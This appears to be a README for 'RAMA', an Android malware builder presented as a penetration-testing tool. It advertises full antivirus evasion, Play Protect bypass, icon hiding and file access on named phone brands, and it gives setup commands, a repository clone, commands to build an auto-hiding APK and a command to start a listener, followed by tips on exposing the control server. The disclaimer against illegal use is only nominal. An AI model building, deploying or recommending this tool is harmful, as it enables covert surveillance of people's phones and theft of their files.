RAMA is a malware tool for android penetration testing which can bypass android default antivirus and playprotect and can run on foreground it's a malware not payload malware created on java and server script created on nodejs and cli created on python.
Don't use this tool for any illegal activity If you do We will not be responsible for it If you agree with our terms and conditions go ahead and download and enjoy.
- FUD
- Foreground Service
- Icon Hide
- Bypass playprotect
- Bypass default antivirus
- Files Access
- Http Service Connection
- Working on Android 8,9,10,11,12,13,14
- Vivo (Android 8, Android 9, Android 10, Android 12, Android 13, Android 14)
- Realme (Android 11)
- Oneplus (Android 12, Android 13)
- Xiaomi (Android 9, Android 11, Android 12)
sudo apt install python3
sudo apt install nodejs
sudo apt install apktool
sudo apt install openjdk-17-jdkgit clone https://github.com/HuiHola/RAMA.git
cd RAMA
pip install -r requirements.txt- build autohide apk after installion
python rama.py -b --autohide true- build simple apk
python rama.py -bafter that prompt ask to http server url don't use ngrok it may throw error use serveo or other
python rama.py -l 8080http server port
